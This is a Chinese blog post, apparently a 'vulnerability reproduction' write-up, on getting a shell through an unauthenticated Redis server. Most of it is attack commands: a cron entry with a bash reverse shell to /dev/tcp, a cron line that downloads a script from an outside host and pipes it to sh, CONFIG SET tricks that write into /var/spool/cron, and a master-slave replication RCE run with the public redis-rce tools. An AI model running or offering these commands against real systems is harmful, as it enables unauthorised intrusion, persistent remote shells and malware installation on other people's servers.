当前位置:网站首页>漏洞复现-redis未授权getshell
漏洞复现-redis未授权getshell
2022-08-09 18:37:00 【amingMM】
redis未授权getshell
简介:
Redis是一个开源的使用ANSI C语言编写、
支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,
并提供多种语言的API。
作为一个高性能的key-value数据库,
Redis在部分场景下对关系数据库起到很好的补充作用。
任务 getshell
E:\hack\envir\redis>redis-cli -h 120.xx.xx.4
rdm客户端 — info 打印 一下 未授权 Linux服务器
set xx "\n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1\n"
*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh
tw:0>config set dir /var/spool/cron/
"ERR Changing directory: No such file or directory"
尝试其他办法
tw2:0>config set dir /var/spool/cron/
"OK"
tw2:0>tw2:0>config set dbfilename root
"OK"
save
140.112.90.153:6379> save
(error) ERR
原因分析:
启动redis-server服务时,没有root权限
解决方案:
sudo kill -9 pid #将redis服务杀掉
sudo redis-server ***/redis.config #sudo使用root权限启动
主从复制 getshell
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git
进入RedisModules-ExecuteCommand目录输入
make
会生成moudle.so 文件
# cp /home/amingmm/RedisModules-ExecuteCommand/module.so /home/amingmm/RedisModules-ExecuteCommand/redis-rce
把生成的moudle.so复制到redis-rce目录里面,之后进入redis-rce目录里面输入
python redis-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so
边栏推荐
- php删除字符串的空格
- Swift--多条件排序
- [免费专栏] Android安全之GDB动态调试APP
- 听音识情绪 | 程序员手把手教你搭建神经网络,更快get女朋友情绪,求生欲max!
- 鹅厂机器狗花式穿越10m梅花桩:前空翻、单桩跳、起身作揖...全程不打一个趔趄...
- What is the Treasure Project (TPC), a dark horse with wings in 2022!
- 数据分散情况的统计图-盒须图
- 以技术创新加速国家“碳中和”建设进程,华为云创新中心助力欣冠精密实现云智控“气”
- Office 365 Group概述以及创建方法
- Mysql table structure change scheme comparison and analysis
猜你喜欢
[] free column Android dynamic debugging GDB APP of safety
WPF 实现带蒙版的 MessageBox 消息提示框
全自动化机器学习建模!效果吊打初级炼丹师!
C#/VB.NET: Extract text and pictures from PowerPoint document
国产抗新冠口服药每瓶不超300元/ 我国IPv6网络全面建成/ 谷歌入局折叠屏手机...今日更多新鲜事在此...
What is the Treasure Project (TPC), a dark horse with wings in 2022!
IDEA tools commonly used configuration
为什么数字钱包需要引入小程序生态
重磅!上海985教授当选!全球仅4人!
华为云全流程护航《流浪方舟》破竹首发,打造口碑爆款
随机推荐
[免费专栏] Android安全之Android奇淫run-as命令
Start cleaning up the long-term divers in the electronic chart development group again
宝塔面板安装使用
Bi Sheng Compiler Optimization: Lazy Code Motion
grafana docks local ldap
Office 365 Group概述以及创建方法
[免费专栏] Android安全之动态代码注入技术(利用JDB调试APK)
Qt 5.12 LTS 部署
你应该试着独自做个游戏
shell之变量详解,让你秒懂!
2021 RoboCom 世界机器人开发者大赛-本科组(决赛)
英赛克工控安全项目入围《钢铁行业智能制造解决方案推荐目录》
韩国严厉监管元宇宙相关企业
Detailed explanation of VIT transformer
uniapp离线推送华为厂商申请流程
字节二面,差点倒在了MySQL上面
poj 1182 食物链(带权并查集)
鲜花线上销售管理系统的设计与实现
From functional testing to automated testing, do you know their shortcomings?
C#/VB.NET:从PowerPoint文档中提取文本和图片